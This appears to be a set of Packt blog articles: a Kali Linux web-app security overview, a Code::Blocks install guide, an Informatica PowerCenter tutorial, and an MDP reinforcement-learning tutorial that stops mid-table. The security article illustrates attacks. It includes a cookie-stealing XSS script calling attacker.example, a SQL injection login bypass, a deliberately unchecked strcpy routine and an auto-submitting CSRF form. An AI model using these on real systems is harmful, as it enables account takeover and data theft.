The security of web-based applications is of critical importance. The strength of an application is about more than the collection of features it provides. It includes essential (yet often overlooked) elements such as security. Kali Linux is a trusted, critical component of a security professional's toolkit for securing web applications. The official documentation says it “is specifically geared to meet the requirements of professional penetration testing and security auditing.” Incidents of security breaches in web-based applications can be largely contained through the deployment of Kali Linux's suite of up-to-date software.

Build secure systems with Kali Linux...

If you wish to employ advanced pentesting techniques with Kali Linux to build highly secured systems, you should check out our recent book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. This book will help you discover concepts such as social engineering, attacking wireless networks, web services, and embedded devices.

What it means to secure Web-based applications

Web application security is the branch of information security that deals with the security of websites and web services (such as APIs); it is the same area that deals with securing web-based applications. For web-based businesses, web application security is a central component. The Internet serves a global population and is used in almost every walk of life one may imagine. As such, web properties can be attacked from various locations and with variable levels of complexity and scale. It is therefore critical to have protection against a variety of security threats that take advantage of vulnerabilities in an application's code.

Common web-based application targets are SaaS (Software-as-a-Service) applications and content management systems like WordPress. A web-based application is a high-priority target if: the source code is complex enough to increase the possibility of vulnerabilities that are not contained and result in malicious code manipulation; the source code contains exploitable bugs, especially where code is not tested extensively; it can provide rewards of high value, including sensitive private data, after successful manipulation of source code; or attacking it is easy to execute, since most attacks are easy to automate and launch against multiple targets. Failing to secure its web-based application opens an organization up to attacks. Common consequences include information theft, damaged client relationships, legal proceedings, and revoked licenses.

Common Web App Security Vulnerabilities

A wide variety of attacks are available in the wild for web-based applications. These include targeted database manipulation and large-scale network disruption. Following are a few vectors or methods of attack used by attackers.

Data breaches

A data breach differs from specific attack vectors. A data breach generally refers to the release of private or confidential information. It can stem from mistakes or from malicious action. Data breaches cover a broad scope and could range from a few highly valuable records to millions of exposed user accounts. Common examples of data breaches include Cambridge Analytica and Ashley Madison.

Cross-site scripting (XSS)

XSS is a vulnerability that gives an attacker a way to inject client-side scripts into a webpage. The attacker can also directly access relevant information, impersonate a user, or trick them into divulging valuable information. A perpetrator could notice a vulnerability in an e-commerce site that permits embedding of HTML tags in the site's comments section. The embedded tags then feature permanently on the page, causing the browser to parse them along with the rest of the source code each time the page is accessed.
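The article does not reproduce such a comment, but a purely illustrative sketch of what an injected comment might look like (with a hypothetical attacker-controlled URL) is shown below; if the site echoes it back unescaped, every visitor's browser executes the script:

<!-- Submitted as a "comment" on the vulnerable page -->
<script>
  // Hypothetical exfiltration of the visitor's session cookie
  new Image().src = "https://attacker.example/steal?c=" + encodeURIComponent(document.cookie);
</script>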
SQL injection (SQLi)

SQL injection is a method whereby a web security vulnerability allows an attacker to interfere with the queries that an application makes to its database. With this, an attacker can view data that they could normally not retrieve. Attackers may also modify or create user permissions, or manipulate or remove sensitive data. Such data could belong to other users, or be any data the application itself can access. In certain cases, an attacker can escalate the attack to exploit backend infrastructure such as the underlying server.

Common SQL injection examples include: retrieving hidden data, thus modifying a SQL query to return enhanced results; subverting application logic by essentially changing a query; UNION attacks, so as to retrieve data from different database tables; examining the database, to retrieve information on the database's version and structure; and blind SQL injection, where you're unable to retrieve application responses from the queries you control.

To illustrate subverting application logic, take an application that lets users log in with a username and password. If the user submits their username as donnie and their password as peddie, the application tests the credentials by performing this SQL query:

SELECT * FROM users WHERE username = 'donnie' AND password = 'peddie'

The login is successful where the query returns the user's details. It is rejected otherwise. An attacker can log in here as a regular user without a password, by merely using the SQL comment sequence -- to eliminate the password check from the WHERE clause of the query. An example is submitting the username admin'-- along with a blank password, resulting in this query:

SELECT * FROM users WHERE username = 'admin'--' AND password = ''

This query returns the user whose username is admin, successfully logging the attacker in as that user.

Memory corruption

Memory corruption occurs when a memory location is modified, leading to unexpected behavior in the software. It is often not deliberate, but bad actors work hard to find and exploit memory corruption using code injection or buffer overflow attacks. Hackers love memory vulnerabilities because they enable them to completely control a victim's machine. Continuing the password example, let's consider a simple password-validation C program (a sketch of such a program appears at the end of this section). The code performs no validation on the length of the user input. It also does not ensure that sufficient memory is available to store the data coming from the user.

Buffer overflow

A buffer is a defined temporary storage area in memory. When software writes data to a buffer, a buffer overflow might occur: overflowing the buffer's capacity leads to overwriting adjacent memory locations with data. Attackers can exploit this to introduce malicious code into memory, with the possibility of developing a vulnerability within the target. In buffer overflow attacks, the extra data sometimes contains specific instructions for actions planned by a malicious user. An example is data that is able to trigger a response that changes data, reveals private information, or damages files.
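The C program itself is not reproduced in this extract; the following is a minimal sketch (our own illustration, with a hypothetical hard-coded password) of the kind of unchecked password-validation routine being described:

#include <stdio.h>
#include <string.h>

/* Vulnerable: copies user input into a fixed-size stack buffer
   without checking its length, so a long input overflows 'buffer'. */
int check_password(const char *input) {
    char buffer[16];
    strcpy(buffer, input);              /* no length validation */
    return strcmp(buffer, "s3cret") == 0;
}

int main(void) {
    char input[256];
    printf("Password: ");
    if (fgets(input, sizeof input, stdin) == NULL)
        return 1;
    input[strcspn(input, "\n")] = '\0'; /* strip the trailing newline */
    puts(check_password(input) ? "Access granted" : "Access denied");
    return 0;
}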
Heap-based buffer overflows are more difficult to execute than stack-based overflows. They are also less common, attacking an application by flooding the memory space dedicated to a program. Stack-based buffer overflows exploit applications by using a stack - a memory space for storing input.

Cross-site request forgery (CSRF)

Cross-site request forgery tricks a victim's browser into submitting requests that carry the user's authentication or authorization details. In effect, the attacker rides on the user's authenticated session and proceeds to send a request while pretending to be the user. Armed with a legitimate user account, the attacker can modify, exfiltrate, or destroy critical information. Vital accounts belonging to executives or administrators are typical targets.

The attacker commonly induces the victim user to perform an action unintentionally. Changing the email address on their account, changing their password, or making a funds transfer are examples of such actions. The nature of the action could give the attacker full control over the user's account. The attacker may even gain full control of the application's data and security if the target user has high privileges within the application.

Three vital conditions for a CSRF attack include: a relevant action within the application that the attacker has reason to induce, such as modifying permissions for other users (a privileged action) or acting on user-specific data (changing the user's password, for example); cookie-based session handling to identify who has made user requests, with no other mechanism in place to track sessions or validate user requests; and no unpredictable request parameters. When causing a user to change their password, for example, the function is not vulnerable if an attacker needs to know the value of the existing password.

Let's say an application contains a function that allows users to change the email address on their account. When a user performs this action, they make a request such as the following:

POST /email/change HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

[email protected]

The attacker may then build a web page containing a hidden, auto-submitting form that issues this same request (a sketch of such a page is shown at the end of this section). When the victim visits the attacker's web page, the following will happen: the attacker's page will trigger an HTTP request to the vulnerable website; if the user is logged in to the vulnerable site, their browser will automatically include their session cookie in the request; and the vulnerable website will carry on as normal, processing the malicious request and changing the victim user's email address.
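The HTML page referenced above is not reproduced in this extract; a typical sketch of such a page (with a hypothetical attacker-controlled email address) would be:

<html>
  <body>
    <!-- Hidden form reproducing the /email/change request shown above -->
    <form action="https://target-site.com/email/change" method="POST">
      <input type="hidden" name="email" value="attacker@evil-site.example" />
    </form>
    <script>
      // Submit automatically on page load; the victim's browser
      // attaches their session cookie to the cross-site request.
      document.forms[0].submit();
    </script>
  </body>
</html>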
Mitigating Vulnerabilities with Kali Linux

Securing web-based user accounts from exploitation includes essential steps, such as using up-to-date encryption. Tools are available in Kali that can help generate application crashes or scan for various other vulnerabilities. Fuzzers, as these tools are called, are a relatively easy way to generate malformed data and observe how applications handle it. Other measures include demanding proper authentication, continuously patching vulnerabilities, and exercising good software development hygiene.

As part of their first line of defence, many companies take a proactive approach, engaging hackers to participate in bug bounty programs. A bug bounty rewards developers for finding critical flaws in software. Open source software like Kali Linux allows anyone to scour an application's code for flaws. Monetary rewards are a typical incentive. White hat hackers can also come onboard with the sole assignment of finding internal vulnerabilities that may have been treated lightly. Smart attackers can find loopholes even in stable security environments, making a fool-proof security strategy a necessity. The security of web-based applications can be strengthened by protecting against Application Layer, DDoS, and DNS attacks.

Kali Linux is a comprehensive tool for securing web-based applications

Organizations curious about the state of security of their web-based application need not fear, especially when they are not prepared for a full-scale penetration test. Attackers are always on the prowl, scanning thousands of web-based applications for the low-hanging fruit. By ensuring a web-based application is resilient in the face of these common attacks, you reduce the chances of it ever experiencing one; the hackers will only migrate to more peaceful grounds.

So, how do organizations or individuals stay secure from attackers? Regular pointers include using HTTPS, adding a Web Application Firewall (WAF), installing security plugins, hashing passwords, and ensuring all software is current. These significant recommendations lower the probability of finding vulnerabilities in application code. Security continues to evolve, so it's best to integrate it into the application development lifecycle. Security vulnerabilities within your app are almost impossible to avoid entirely. To identify them, one must think like an attacker and test the web-based application thoroughly.

Kali Linux, a Debian Linux derivative from Offensive Security Limited, is built primarily for digital forensics and penetration testing. It is a successor to the revered BackTrack Linux project. The BackTrack project was based on Knoppix and manually maintained. Offensive Security wanted a true Debian derivative, with all the necessary infrastructure and improved packaging techniques. The quality, stability, and wide software selection were key considerations in choosing Debian.

While developers churn out web-based applications by the minute, the number of web-based application attacks grows alongside at an exponential rate. Attackers are interested in exploiting flaws in the applications, just as organizations want the best way to detect attackers' footprints with a web application firewall, which detects and blocks those specific attack patterns against the web-based application.

Key features of Kali Linux

Kali Linux has 32-bit and 64-bit distributions for hosts relying on the x86 instruction set. There's also an image for the ARM architecture. The ARM architecture image is for the Beagle Board computer and the ARM Chromebook from Samsung. Kali Linux is also available for other devices such as the Asus Chromebook Flip C100P, HP Chromebook, CuBox, CubieBoard 2, Raspberry Pi, Odroid U2, EfikaMX, Odroid XU, Odroid XU3, Utilite Pro, SS808, Galaxy Note 10.1, and BeagleBone Black. There are plans to make distributions for more ARM devices.

Android devices like Google's Nexus line, OnePlus One, and Galaxy models can also run Kali Linux through Kali NetHunter. Kali NetHunter is Offensive Security's project to ensure compatibility and porting to specific Android devices. Via the Windows Subsystem for Linux (WSL), Windows 10 users can use any of the more than 600 ethical hacking tools within Kali Linux to expose vulnerabilities in web applications. The official Windows distribution is available from the Microsoft Store, and there are tools for various other systems and platforms.
Conclusion Despite a plethora of tools dedicated to web app security and a robust curation mechanism, Kali Linux is the distribution of choice to expose vulnerabilities in web-based applications. Other tool options include Kubuntu, Black Parrot OS, Cyborg Linux, BackBox Linux, and Wifislax. While being open source has helped its meteoric rise, Kali Linux is one of the better platforms for up-to-date security utilities. It remains the most advanced penetration testing platform out there, supporting a wide variety of devices and hardware platforms. Kali Linux also has decent documentation compared to numerous other open source projects. There is a large, active, and vibrant community and you can easily install Kali Linux in VirtualBox on Windows to begin your hacking exploits right away. To further discover various stealth techniques to remain undetected and defeat modern infrastructures and also to explore red teaming techniques to exploit secured environment, do check out the book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. Author Bio Chris is a growth marketing and cybersecurity expert writer. He has contributed to sites such as “Cyber Defense Magazine,” “Social Media News,” and “MTA.” He’s also contributed to several cybersecurity magazines. He enjoys freelancing and helping others learn more about protecting themselves online. He’s always curious and interested in learning about the latest developments in the field. He’s currently the Editor in Chief for EveryCloud’s media division. Glen Singh on why Kali Linux is an arsenal for any cybersecurity professional [Interview] 3 cybersecurity lessons for e-commerce website administrators Implementing Web application vulnerability scanners with Kali Linux [Tutorial]

Getting Started with Code::Blocks

Packt
28 Oct 2013
7 min read
(For more resources related to this topic, see here.) Why Code::Blocks? Before we go on learning more about Code::Blocks let us understand why we shall use Code::Blocks over other IDEs. It is a cross-platform Integrated Development Environment (IDE). It supports Windows, Linux, and Mac operating system. It supports GCC compiler and GNU debugger on all supported platforms completely. It supports numerous other compilers to various degrees on multiple platforms. It is scriptable and extendable. It comes with several plugins that extend its core functionality. It is lightweight on resources and doesn't require a powerful computer to run it. Finally, it is free and open source. Installing Code::Blocks on Windows Our primary focus of this article will be on Windows platform. However, we'll touch upon other platforms wherever possible. Official Code::Blocks binaries are available from www.codeblocks.org. Perform the following steps for successful installation of Code::Blocks: For installation on Windows platform download codeblocks-12.11mingw-setup.exe file from http://www.codeblocks.org/downloads/26 or from sourceforge mirror http://sourceforge.net/projects/codeblocks/files/Binaries/12.11/Windows/codeblocks-12.11mingw-setup.exe/download and save it in a folder. Double-click on this file and run it. You'll be presented with the following screen: As shown in the following screenshot click on the Next button to continue. License text will be presented. The Code::Blocks application is licensed under GNU GPLv3 and Code::Blocks SDK is licensed under GNU LGPLv3. You can learn more about these licenses at this URL—https://www.gnu.org/licenses/licenses.html. Click on I Agree to accept the License Agreement. The component selection page will be presented in the following screenshot: You may choose any of the following options: Default install: This is the default installation option. This will install Code::Block's core components and core plugins. Contrib Plugins: Plugins are small programs that extend Code::Block's functionality. Select this option to install plugins contributed by several other developers. C::B Share Config: This utility can copy all/parts of configuration file. MinGW Compiler Suite: This option will install GCC 4.7.1 for Windows. Select Full Installation and click on Next button to continue. As shown in the following screenshot installer will now prompt to select installation directory: You can install it to default installation directory. Otherwise choose Destination Folder and then click on the Install button. Installer will now proceed with installation. As shown in the following screenshot Code::Blocks will now prompt us to run it after the installation is completed: Click on the No button here and then click on the Next button. Installation will now be completed: Click on the Finish button to complete installation. A shortcut will be created on the desktop. This completes our Code::Blocks installation on Windows. Installing Code::Blocks on Linux Code::Blocks runs numerous Linux distributions. In this section we'll learn about installation of Code::Blocks on CentOS linux. CentOS is a Linux distro based on Red Hat Enterprise Linux and is a freely available, enterprise grade Linux distribution. Perform the following steps to install Code::Blocks on Linux OS: Navigate to Settings | Administration | Add/Remove Software menu option. Enter wxGTK in the Search box and hit the Enter key. As of writing wxGTK-2.8.12 is the latest wxWidgets stable release available. 
Select it and click on the Apply button to install wxGTK package via the package manager, as shown in the following screenshot. Download packages for CentOS 6 from this URL—http://www.codeblocks.org/downloads/26. Unpack the .tar.bz2 file by issuing the following command in shell: tar xvjf codeblocks-12.11-1.el6.i686.tar.bz2 Right-click on the codeblocks-12.11-1.el6.i686.rpm file as shown in the following screenshot and choose the Open with Package Installer option. The following window will be displayed. Click on the Install button to begin installation, as shown in the following screenshot: You may be asked to enter the root password if you are installing it from a user account. Enter the root password and click on the Authenticate button. Code::Blocks will now be installed. Repeat steps 4 to 6 to install other rpm files. We have now learned to install Code::Blocks on the Windows and Linux platforms. We are now ready for C++ development. Before doing that we'll learn about the Code::Blocks user interface. First run On the Windows platform navigate to the Start | All Programs | CodeBlocks | CodeBlocks menu options to launch Code::Blocks. Alternatively you may double-click on the shortcut displayed on the desktop to launch Code::Blocks, as in the following screenshot: On Linux navigate to Applications | Programming | Code::Blocks IDE menu options to run Code::Blocks. Code::Blocks will now ask the user to select the default compiler. Code::Blocks supports several compilers and hence, is able to detect the presence of other compilers. The following screenshot shows that Code::Blocks has detected GNU GCC Compiler (which was bundled with the installer and has been installed). Click on it to select and then click on Set as default button, as shown in the following screenshot: Do not worry about the items highlighted in red in the previous screenshot. Red colored lines indicate Code::Blocks was unable to detect the presence of a particular compiler. Finally, click on the OK button to continue with the loading of Code::Blocks. After the loading is complete the Code::Blocks window will be shown. The following screenshot shows main window of Code::Blocks. Annotated portions highlight different User Interface (UI) components: Now, let us understand more about different UI components: Menu bar and toolbar: All Code::Blocks commands are available via menu bar. On the other hand toolbars provide quick access to commonly used commands. Start page and code editors: Start page is the default page when Code::Blocks is launched. This contains some useful links and recent project and file history. Code editors are text containers to edit C++ (and other language) source files. These editors offer syntax highlighting—a feature that highlights keywords in different colors. Management pane: This window shows all open files (including source files, project files, and workspace files). This pane is also used by other plugins to provide additional functionalities. In the preceding screenshot FileManager plugin is providing a Windows Explorer like facility and Code Completion plugin is providing details of currently open source files. Log windows: Log messages from different tools, for example, compiler, debugger, document parser, and so on, are shown here. This component is also used by other plugins. Status bar: This component shows various status information of Code::Blocks, for example, file path, file encoding, line numbers, and so on. 
Introduction to important toolbars Toolbars provide easier access to different functions of Code::Blocks. Amongst the several toolbars following ones are most important. Main toolbar The main toolbar holds core component commands. From left to right there are new file, open file, save, save all, undo, redo, cut, copy, paste, find, and replace buttons. Compiler toolbar The compiler toolbar holds commonly used compiler related commands. From left to right there are build, run, build and run, rebuild, stop build, build target buttons. Compilation of C++ source code is also called a build and this terminology will be used throughout the article. Debugger toolbar The debugger toolbar holds commonly used debugger related commands. From left to right there are debug/continue, run to cursor, next line, step into, step out, next instruction, step into instruction, break debugger, stop debugger, debugging windows, and various info buttons. Summary In this article we have learned to download and install Code::Blocks. We also learnt about different interface elements. Resources for Article: Further resources on this subject: OpenGL 4.0: Building a C++ Shader Program Class [Article] Application Development in Visual C++ - The Tetris Application [Article] Building UI with XAML for Windows 8 Using C [Article]

Working with Targets in Informatica PowerCenter 10.x

Savia Lobo
11 Dec 2017
8 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book by Rahul Malewar titled Learning Informatica PowerCenter 10.x. The book harnesses the power and simplicity of Informatica PowerCenter 10.x to build and manage efficient data management solutions.[/box] This article guides you through working with the target designer in the Informatica’s PowerCenter. It provides a user interface for creation and customization of the logical target schema. PowerCenter is capable of working with different types of targets to load data: Database: PowerCenter supports all the relations databases such as Oracle, Sybase, DB2, Microsoft SQL Server, SAP HANA, and Teradata. File: This includes flat files (fixed width and delimited files), COBOL Copybook files, XML files, and Excel files. High-end applications: PowerCenter also supports applications such as Hyperion, PeopleSoft, TIBCO, WebSphere MQ, and so on. Mainframe: Additional features of Mainframe such as IBM DB2 OS/390, IBM DB2 OS/400, IDMS, IDMS-X, IMS, and VSAM can be purchased Other: PowerCenter also supports Microsoft Access and external web services. Let's start! Working with Target relational database tables - the Import option Just as we discussed importing and creating source files and source tables, we need to work on target definitions. The process of importing the target table is exactly same as importing the Source table, the only difference is that you need to work in the Target Designer. You can import or create the table structure in the Target Designer. After you add these target definitions to the repository, you can use them in a mapping. Follow these steps to import the table target definition: In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Targets | Importfrom Database. From the ODBC data source button, select the ODBC data source that you created to access source tables. We have already added the data source while working on the sources. Enter the username and password to connect to the database. Click on Connect. In the Select tables list, expand the database owner and the TABLE heading. Select the tables you wish to import, and click on OK. The structure of the selected tables will appear in the Target Designer in workspace. As mentioned, the process is the same as importing the source in the Source Analyzer. Follow the preceding steps in case of some issues. Working with Target Flat Files - the Import option The process of importing the target file is exactly same as importing the Source file, the only difference is that you need to work on the Target Designer. Working with delimited files Following are the steps that you will have to perform to work with delimited files. In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Importfrom File. Browse the files you wish to import as source files. The flat file import wizard will come up. Select the file type -- Delimited. Also, select the appropriate option to import the data from second row and import filed names from the first line as we did in case of importing the source. Click on Next. Select the type of delimiter used in the file. Also, check the quotes option -- No Quotes, Single Quotes, and Double Quotes -- to work with the quotes in the text values. Click on Next. Verify the column names, data type, and precision in the data view option. Click on Next. Click on Finish to get the target file imported in the Target Designer. We now move on to fixed width files. 
Working with fixed width Files Following are the steps that you will have to perform to work with fixed width Files: In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Import from File. Browse the files you wish to use as source files. The Flat file import wizard will come up. Select the file type -- fixed width. Click on Next. Set the width of each column as required by adding a line break. Click on Next. Specify the column names, data type, and precision in the data view option. Click on Next. Click on Finish to get the target imported in the Target Designer. Just as in the case of working with sources, we move on to the create option in target. Working with Target - the Create option Apart from importing the file or table structure, we can manually create the Target Definition. When the sample Target file or the table structure is not available, we need to manually create the Target structure. When we select the create option, we need to define every detail related to the file or table manually, such as the name of the Target, the type of the Target, column names, column data type, column data size, indexes, constraints, and so on. When you import the structure, the import wizard automatically imports all these details. In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Create. Select the type of Target you wish to create from the drop-down list. An empty target structure will appear in the Target Designer. Double-click on the title bar of the target definition for the T_EMPLOYEES table. This will open the T_EMPLOYEES target definition. A popup window will display all the properties of this target definition. The Table tab will show the name of the table, the name of the owner, and the database type. You can add a comment in the Description section. Usually, we keep the Business name empty. Click on the Columns tab. This will display the column descriptions for the target. You can add, delete, or edit the columns. Click on the Metadata Extensions tab (usually, you keep this tab blank). You can store some Metadata related to the target you created. Some personal details and reference details can be saved. Click on Apply and then on OK. Go to Repository | Save to save the changes to the repository. Let's move on to something interesting now! Working with Target - the Copy or Drag-Drop option PowerCenter provides a very convenient way of reusing the existing components in the Repository. It provides the Drag-Drop feature, which helps in reusing the existing components. Using the Drag-Drop feature, you can copy the existing source definition created earlier to the Target Designer in order to create the target definition with the same structure. Follow these steps: Step 1: In the Designer, go to Tools | Target Designer to open the Target Designer. Step 2: Drag the SRC_STUDENT source definition from the Navigator to the Target Designer workspace as shown in the following screenshot: Step 3: The Designer creates a target definition, SRC_STUDENT, with the same column definitions as the SRC_STUDENT source definition and the same database type: Step 4: Double-click on the title bar of the SRC_STUDENT target definition to open it and edit properties if you wish to change some properties. Step 5: Click on Rename: Step 6: A new pop-up window will allow you to mention the new name. Change the target definition name to TGT_STUDENT: Step 7: Click on OK Step 8: Click on the Columns tab. 
The target column definitions are the same as the SRC_STUDENT source definition. You can add new columns, delete existing columns, or edit the columns as per your requirement. Step 9: Click on OK to save the changes and close the dialog box. Step 10: Go to Repository | Save Creating Source Definition from Target structure With Informatica PowerCenter 10.1.0, now you can drag and drop the target definition from target designer into Source Analyzer. In the previous topic, we learned to drag-drop the Source definition from Source Analyzer and reuse it in Target Designer. In the previous versions of Informatica, this feature was not available. In the latest version, this feature is now available. Follow the steps as shown in the preceding section to drag-drop the target definition into Source Analyzer. In the article, we have tried to explain how to work with the target designer, one of the basic component of the PowerCenter designer screen in Informatica 10.x. Additionally to use the target definition from the target designer to create a source definition. If you liked the above article, checkout our book, Learning Informatica PowerCenter 10.x. The book will let you explore more on how to implement various data warehouse and ETL concepts, and use PowerCenter 10.x components to build mappings, tasks, workflows, and so on.  

Implement Reinforcement learning using Markov Decision Process [Tutorial]

Fatema Patrawala
09 Jul 2018
11 min read
The Markov decision process, better known as MDP, is an approach in reinforcement learning to take decisions in a gridworld environment. A gridworld environment consists of states in the form of grids. The MDP tries to capture a world in the form of a grid by dividing it into states, actions, models/transition models, and rewards. The solution to an MDP is called a policy and the objective is to find the optimal policy for that MDP task. Thus, any reinforcement learning task composed of a set of states, actions, and rewards that follows the Markov property would be considered an MDP. In this tutorial, we will dig deep into MDPs, states, actions, rewards, policies, and how to solve them using Bellman equations. This article is a reinforcement learning tutorial taken from the book, Reinforcement learning with TensorFlow.

Markov decision processes

An MDP is defined as the collection of the following:
States: S
Actions: A(s), A
Transition model: T(s,a,s') ~ P(s'|s,a)
Rewards: R(s), R(s,a), R(s,a,s')
Policy: π, where π* is the optimal policy

In the case of an MDP, the environment is fully observable, that is, whatever observation the agent makes at any point in time is enough to make an optimal decision. In the case of a partially observable environment, the agent needs a memory to store the past observations to make the best possible decisions. Let's try to break this into different lego blocks to understand what this overall process means.

The Markov property

In short, as per the Markov property, in order to know the information of the near future (say, at time t+1), only the present information at time t matters. Given a sequence s_1, s_2, ..., s_t, the first order of Markov says P(s_(t+1) | s_1, s_2, ..., s_t) = P(s_(t+1) | s_t), that is, s_(t+1) depends only on s_t. Therefore, s_(t+2) will depend only on s_(t+1). The second order of Markov says P(s_(t+1) | s_1, s_2, ..., s_t) = P(s_(t+1) | s_t, s_(t-1)), that is, s_(t+1) depends only on s_t and s_(t-1). In our context, we will follow the first order of the Markov property from now on. Therefore, we can convert any process to a Markov property if the probability of the new state, say s_(t+1), depends only on the current state, s_t, such that the current state captures and remembers the property and knowledge from the past. Thus, as per the Markov property, the world (that is, the environment) is considered to be stationary, that is, the rules in the world are fixed.

The S state set

The S state set is a set of different states, represented as s, which constitute the environment. States are the feature representation of the data obtained from the environment. Thus, any input from the agent's sensors can play an important role in state formation. State spaces can be either discrete or continuous. The agent starts from the start state and has to reach the goal state in the most optimized path without ending up in bad states (like the red colored state shown in the diagram below). Consider the following gridworld as having 12 discrete states, where the green-colored grid is the goal state, red is the state to avoid, and black is a wall that you'll bounce back from if you hit it head on: The states can be represented as 1, 2, ..., 12 or by coordinates, (1,1), (1,2), ..., (3,4).

Actions

The actions are the things an agent can perform or execute in a particular state. In other words, actions are sets of things an agent is allowed to do in the given environment. Like states, actions can also be either discrete or continuous.
Consider the following gridworld example having 12 discrete states and 4 discrete actions (UP, DOWN, RIGHT, and LEFT): The preceding example shows the action space to be a discrete set space, that is, a ∈ A, where A = {UP, DOWN, RIGHT, LEFT}. It can also be treated as a function of state, that is, a = A(s), where depending on the state function, it decides which action is possible.

Transition model

The transition model T(s, a, s') is a function of three variables, which are the current state (s), action (a), and the new state (s'), and defines the rules to play the game in the environment. It gives probability P(s'|s, a), that is, the probability of landing up in the new s' state given that the agent takes an action, a, in the given state, s. The transition model plays the crucial role in a stochastic world, unlike the case of a deterministic world where any landing state other than the determined one has zero probability. Let's consider the following environment (world) and consider different cases, determined and stochastic. The actions are a ∈ A, where A = {UP, DOWN, RIGHT, LEFT}. The behavior of these two cases depends on certain factors:
Determined environment: In a determined environment, if you take a certain action, say UP, you will certainly perform that action with probability 1.
Stochastic environment: In a stochastic environment, if you take the same action, say UP, there will be a certain probability, say 0.8, of actually performing the given action, and a 0.1 probability each of performing an action perpendicular to the given action, UP (that is, LEFT or RIGHT). Here, for the s state and the UP action, the transition model gives T(s, UP, s') = P(s'|s, UP) = 0.8.
Since T(s,a,s') ~ P(s'|s,a), the probability of the new state depends only on the current state and action, and on none of the past states. Thus, the transition model follows the first-order Markov property. We can also say that our universe is also a stochastic environment, since the universe is composed of atoms that are in different states defined by position and velocity. Actions performed by each atom change their states and cause changes in the universe.

Rewards

The reward of the state quantifies the usefulness of entering into a state. There are three different forms to represent the reward, namely R(s), R(s, a), and R(s, a, s'), but they are all equivalent. For a particular environment, the domain knowledge plays an important role in the assignment of rewards for different states, as minor changes in the reward do matter for finding the optimal solution to an MDP problem. There are two approaches to rewarding our agent for taking a certain action. They are:
Credit assignment problem: We look at the past and check which actions led to the present reward, that is, which action gets the credit.
Delayed rewards: In contrast, in the present state, we check which action to take that will lead us to potential rewards.
Delayed rewards form the idea of foresight planning. Therefore, this concept is being used to calculate the expected reward for different states. We will discuss this in the later sections.

Policy

Until now, we have covered the blocks that create an MDP problem, that is, states, actions, transition models, and rewards; now comes the solution. The policy is the solution to an MDP problem. The policy is a function that takes the state as an input and outputs the action to be taken. Therefore, the policy is a command that the agent has to obey.
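In code, a policy over a small discrete state space can be represented as a plain lookup table. The short Python sketch below is only an illustration: the grid coordinates and the chosen actions are arbitrary assumptions, not the optimal policy for the gridworld above.

# A policy maps each state to the action the agent should take there.
policy = {
    (1, 1): "RIGHT",
    (1, 2): "RIGHT",
    (2, 1): "UP",
}

def act(state):
    """Return the action prescribed by the policy for the given state."""
    return policy[state]

print(act((1, 2)))   # RIGHT

Finding the optimal version of such a table is exactly what the Bellman machinery in the next section is about.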
π* is called the optimal policy, which maximizes the expected reward. Among all the policies taken, the optimal policy is the one that maximizes the amount of reward received or expected to be received over a lifetime. For an MDP, there's no end of the lifetime and you have to decide the end time. Thus, the policy is nothing but a guide telling which action to take for a given state. It is not a plan but uncovers the underlying plan of the environment by returning the actions to take for each state.

The Bellman equations

Since the optimal π* policy is the policy that maximizes the expected rewards,

π* = argmax_π E[ Σ_t γ^t R(s_t) | π ]

where E[...] means the expected value of the rewards obtained from the sequence of states the agent observes if it follows the π policy. Thus, argmax_π outputs the π policy that has the highest expected reward. Similarly, we can also calculate the utility of the policy of a state, that is, if we are at the s state, given a π policy, then the utility of the π policy for the s state, that is, U^π(s), would be the expected rewards from that state onward:

U^π(s) = E[ Σ_t γ^t R(s_t) | π, s_0 = s ]

The immediate reward of the state, that is, R(s), is different than the utility of the s state, U(s) (that is, the utility of the optimal policy of the s state), because of the concept of delayed rewards. From now onward, the utility of the s state will refer to the utility of the optimal policy of the state, that is, U(s). Moreover, the optimal policy can also be regarded as the policy that maximizes the expected utility. Therefore,

π*(s) = argmax_a Σ_s' T(s,a,s') U(s')

where T(s,a,s') is the transition probability, that is, P(s'|s,a), and U(s') is the utility of the new landing state after the a action is taken on the s state. Σ_s' T(s,a,s') U(s') refers to the summation over all possible new state outcomes for a particular action taken; whichever action gives the maximum value of that summation is considered to be part of the optimal policy and, thereby, the utility of the s state is given by the following Bellman equation:

U(s) = R(s) + γ max_a Σ_s' T(s,a,s') U(s')

where R(s) is the immediate reward and γ max_a Σ_s' T(s,a,s') U(s') is the reward from the future, that is, the discounted (by the factor γ) utilities of the states that the agent can reach from the given s state if the action a is taken.

Solving the Bellman equation to find policies

Say we have some n states in the given environment; looking at the Bellman equation, we find that n states give us n equations with n unknowns, but the max_a operation makes the system non-linear. Thus, we cannot solve them as linear equations. Therefore, in order to solve: Start with an arbitrary utility. Update the utilities based on the neighborhood until convergence, that is, update the utility of the state using the Bellman equation based on the utilities of the landing states from the given state. Iterate this multiple times to lead to the true value of the states. This process of iterating to convergence towards the true value of the state is called value iteration. For the terminal states where the game ends, the utility of those terminal states equals the immediate reward the agent receives while entering the terminal state. Let's try to understand this by implementing an example.

An example of value iteration using the Bellman equation

Consider the following environment and the given information: Given information: A, C, and X are the names of some states. The green-colored state is the goal state, G, with a reward of +1. The red-colored state is the bad state, B, with a reward of -1; try to prevent your agent from entering this state. Thus, the green and red states are the terminal states; enter either and the game is over.
If the agent encounters the green state, that is, the goal state, the agent wins, while if they enter the red state, then the agent loses the game. The discount factor is γ = 0.5, R(s) = -0.04 for every non-terminal state (that is, the reward for all states except the G and B states is -0.04), and U_0(s) = 0 for every non-terminal state (that is, the utility at the first time step is 0, except for the G and B states, which keep their rewards of +1 and -1). Transition probability T(s,a,s') equals 0.8 if going in the desired direction; otherwise, 0.1 each if going perpendicular to the desired direction. For example, if the action is UP then with 0.8 probability the agent goes UP, but with 0.1 probability it goes RIGHT and 0.1 to the LEFT.

Questions:
Find U_1(X), the utility of the X state at time step 1, that is, after the agent goes through one iteration.
Similarly, find U_2(X).

Solution: R(X) = -0.04

Action a | s' | T(s,a,s') | U_0(s') | T x U_0
